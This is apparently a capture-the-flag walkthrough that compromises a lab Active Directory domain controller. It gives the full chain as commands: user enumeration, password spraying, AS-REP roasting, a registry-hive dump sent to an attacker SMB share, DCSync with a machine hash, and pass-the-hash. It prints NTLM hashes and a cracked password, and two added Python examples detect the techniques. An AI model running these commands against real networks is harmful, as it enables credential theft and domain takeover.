DC02

After we downloaded this machine and configured its network interface just like DC01, we perform an SMB sweep to find the machine we are going to attack:

Enumeration:

netexec smb 10.0.2.0/24

We will add it to /etc/hosts:

Let's start with nmap:

nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv 10.0.2.29

Let's see if we have anonymous access to the box:

netexec smb soupedecode.local -u '' -p ''

We do not have access either anonymously or as a guest user.

At this point we can check whether LDAP allows an anonymous bind, or start brute-forcing usernames with kerbrute:

kerbrute userenum -d soupedecode.local --dc 10.0.2.29 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

We immediately found some users:

We will add them to a text file for password spraying or AS-REP roasting:

netexec smb soupedecode.local -u users.txt -p users.txt --no-bruteforce --continue-on-success

Now we have valid credentials.

Move Laterally to zximena448:

We can start by dumping users or by taking a look at the shares:

netexec smb soupedecode.local -u charlie -p charlie --shares

There is no interesting share.

Let's dump the users:

netexec smb soupedecode.local -u charlie -p charlie --users

We got a lot of users; we can redirect the output to a file and extract the usernames from it:

Since we have a list of valid users, we can try AS-REP Roasting:

impacket-GetNPUsers soupedecode.local/ -dc-ip 10.0.2.29 -no-pass -usersfile users.txt

Now that we have obtained this user's hash, we can attempt to crack it with hashcat:

hashcat zximena448.hash /usr/share/wordlists/rockyou.txt

We got the password; let's see whether we have administrative privileges or WinRM access:

netexec smb soupedecode.local -u zximena448 -p internet
netexec winrm soupedecode.local -u zximena448 -p internet

We still do not have access to the system.

Privilege Escalation:

We can use bloodhound to see what path could lead to full administrative privileges or interesting groups.

I will use ldapdomaindump to dump the domain objects info:

ldapdomaindump 10.0.2.29 -u 'soupedecode.local\zximena448' -p 'internet' --no-html --no-grep

Let's see if any of our owned users has anything useful:

cat domain_users.json | jq '.[] | select(.attributes.sAMAccountName[] == "zximena448")'

As shown, zximena448 is a member of Backup Operators, which gives us the ability to dump the SAM database. First we need to start an SMB share so that the tool which dumps the SAM database can write it to our local machine:
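
The jq query above answers "what is this one user a member of"; a defender wants the opposite question over the whole export: which accounts sit in privileged built-in groups such as Backup Operators, and which of those are also AS-REP roastable, since that is exactly the combination this path chains together. The following is an added example, not part of the write-up, that audits a constructed excerpt in the shape of ldapdomaindump's domain_users.json (a list of objects with a "dn" and a dict of multi-valued "attributes"); the svc_backup and guest2 accounts are hypothetical, and the list of sensitive groups is an assumption.

```python
"""Audit an ldapdomaindump export for accounts that are both AS-REP roastable
and members of a privileged built-in group. Added example; the JSON below is
a constructed excerpt, not the lab's real domain_users.json."""
import json

DONT_REQ_PREAUTH = 0x400000   # userAccountControl flag
SENSITIVE_GROUPS = {          # assumption: groups that can reach domain credentials
    "Domain Admins", "Administrators", "Backup Operators",
    "Account Operators", "Server Operators", "Print Operators",
}

# Constructed excerpt in the shape ldapdomaindump writes.
DOMAIN_USERS_JSON = json.dumps([
    {"dn": "CN=charlie,CN=Users,DC=soupedecode,DC=local",
     "attributes": {"sAMAccountName": ["charlie"], "memberOf": [],
                    "userAccountControl": [512]}},
    {"dn": "CN=zximena448,CN=Users,DC=soupedecode,DC=local",
     "attributes": {"sAMAccountName": ["zximena448"],
                    "memberOf": ["CN=Backup Operators,CN=Builtin,DC=soupedecode,DC=local"],
                    "userAccountControl": [512 | DONT_REQ_PREAUTH]}},
    {"dn": "CN=svc_backup,CN=Users,DC=soupedecode,DC=local",   # hypothetical account
     "attributes": {"sAMAccountName": ["svc_backup"],
                    "memberOf": ["CN=Backup Operators,CN=Builtin,DC=soupedecode,DC=local"],
                    "userAccountControl": [512]}},
    {"dn": "CN=guest2,CN=Users,DC=soupedecode,DC=local",       # hypothetical account
     "attributes": {"sAMAccountName": ["guest2"], "memberOf": [],
                    "userAccountControl": [512 | DONT_REQ_PREAUTH]}},
])


def load_users(text):
    return json.loads(text)


def _attr(entry, name, default=None):
    """ldapdomaindump stores every attribute as a list; return the first value."""
    values = entry["attributes"].get(name, [])
    return values[0] if values else default


def _group_cn(dn):
    """'CN=Backup Operators,CN=Builtin,DC=...' -> 'Backup Operators'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def members_of(users, group_cn):
    """Accounts whose memberOf lists the given group (direct membership only)."""
    return sorted(_attr(u, "sAMAccountName") for u in users
                  if any(_group_cn(g) == group_cn
                         for g in u["attributes"].get("memberOf", [])))


def asrep_roastable(users):
    """Accounts with DONT_REQ_PREAUTH set in userAccountControl."""
    return sorted(_attr(u, "sAMAccountName") for u in users
                  if int(_attr(u, "userAccountControl", 0)) & DONT_REQ_PREAUTH)


def privileged_and_roastable(users):
    """{account: [sensitive groups]} for roastable accounts in sensitive groups."""
    roastable = set(asrep_roastable(users))
    result = {}
    for u in users:
        name = _attr(u, "sAMAccountName")
        if name not in roastable:
            continue
        groups = sorted(_group_cn(g) for g in u["attributes"].get("memberOf", [])
                        if _group_cn(g) in SENSITIVE_GROUPS)
        if groups:
            result[name] = groups
    return result


if __name__ == "__main__":
    users = load_users(DOMAIN_USERS_JSON)
    print("Backup Operators:", members_of(users, "Backup Operators"))
    print("AS-REP roastable:", asrep_roastable(users))
    print("Fix first:", privileged_and_roastable(users))
```

Two caveats for a real audit: memberOf only records direct membership, so nested groups and membership granted through primaryGroupID are not visible here and need to be resolved against domain_groups.json; and a member of Backup Operators can read the SAM and SYSTEM hives of a domain controller, which is why the page's next step works, so that group deserves the same scrutiny as Domain Admins.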

impacket-smbserver -smb2support share .
impacket-reg "soupedecode.local"/"zximena448":"internet"@"10.0.2.29" backup -o '\\10.0.2.18\share'

After the hives have been saved, we can use secretsdump to extract the hashes from the SAM database:

impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save local

Here we go.

I tried to authenticate with the local administrator NTLM hash, but I could not; maybe the password has been changed.

But we also have the NTLM hash of the machine account (DC01$), which belongs to the domain controller itself and therefore has the rights to dump the NTDS hashes:

impacket-secretsdump soupedecode.local/'DC01$'@10.0.2.29 -hashes :db40071d97a4266402e661a1e3711f1f
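
This step is a DCSync-style replication request, and it is hard to catch by account alone: DC01$ is a genuine domain controller account, so a rule that only asks "is this principal allowed to replicate" would pass it. What gives it away is that the replication request arrives from a host that is not a domain controller. The following is an added example, not part of the write-up, that joins 4662 directory-object access events carrying the replication extended rights to the 4624 network logon that created the session and flags any request whose source address is not a known DC. The events are constructed, BACKUPDC$ and 10.0.2.30 are a hypothetical second domain controller, and KNOWN_DC_ADDRESSES is an assumption.

```python
"""Flag replication requests (DS-Replication-Get-Changes rights in 4662)
whose session (4624) came from a host that is not a domain controller.
Added example with constructed events; the DC address list is an assumption."""
import re

# Extended rights that allow an account to pull password data from NTDS.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # domainDNS object class

# Assumption: addresses of hosts that legitimately replicate (10.0.2.30 is constructed).
KNOWN_DC_ADDRESSES = {"10.0.2.29", "10.0.2.30"}

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Constructed Security-log records; field names follow the event XML.
SAMPLE_EVENTS = [
    # DC01$ logging on over the network from the attacker's workstation
    {"EventID": 4624, "TargetUserName": "DC01$", "TargetLogonId": "0x5a2b1c",
     "LogonType": "3", "IpAddress": "10.0.2.18"},
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectLogonId": "0x5a2b1c",
     "ObjectType": "%{" + DOMAIN_DNS_CLASS + "}", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {" + DOMAIN_DNS_CLASS + "}"},
    # a hypothetical second DC replicating from a known DC address: expected
    {"EventID": 4624, "TargetUserName": "BACKUPDC$", "TargetLogonId": "0x71f00e",
     "LogonType": "3", "IpAddress": "10.0.2.30"},
    {"EventID": 4662, "SubjectUserName": "BACKUPDC$", "SubjectLogonId": "0x71f00e",
     "ObjectType": "%{" + DOMAIN_DNS_CLASS + "}", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {" + DOMAIN_DNS_CLASS + "}"},
    # an ordinary object access without replication rights: ignored
    {"EventID": 4624, "TargetUserName": "charlie", "TargetLogonId": "0x9c4d01",
     "LogonType": "3", "IpAddress": "10.0.2.18"},
    {"EventID": 4662, "SubjectUserName": "charlie", "SubjectLogonId": "0x9c4d01",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights_in(properties):
    """Names of the replication extended rights present in a 4662 Properties field."""
    guids = {g.lower() for g in GUID_RE.findall(properties)}
    return sorted(REPLICATION_RIGHTS[g] for g in guids & set(REPLICATION_RIGHTS))


def find_suspicious_replication(events, known_dcs=KNOWN_DC_ADDRESSES):
    """Replication requests whose logon session did not originate from a known DC."""
    # Map each logon session to the address it came from.
    session_ip = {e["TargetLogonId"]: e["IpAddress"]
                  for e in events if e["EventID"] == 4624}
    findings = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        rights = replication_rights_in(e["Properties"])
        if not rights:
            continue
        source = session_ip.get(e["SubjectLogonId"], "unknown")
        if source not in known_dcs:
            findings.append({"account": e["SubjectUserName"], "source": source,
                             "logon_id": e["SubjectLogonId"], "rights": rights})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_replication(SAMPLE_EVENTS):
        print(f"{f['account']} replicated from {f['source']}: {', '.join(f['rights'])}")
```

Auditing "Replicating Directory Changes" on the domain object (category Directory Service Access, success) must be enabled for 4662 to be written at all. A session whose 4624 is missing is reported with source "unknown" rather than dropped, so log gaps surface as findings instead of hiding them; 4662 events from a DC's own system session (Logon ID 0x3e7) have no 4624 and show up that way, which is a useful prompt to add a local-session exemption before deploying this.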

Here is the domain administrator NTLM hash; we can authenticate via evil-winrm:

evil-winrm -i 10.0.2.29 -u administrator -H 8982babd4da89d33210779a6c5b078bd

Here is the root flag, you can get the user flag from the zximena448 desktop.
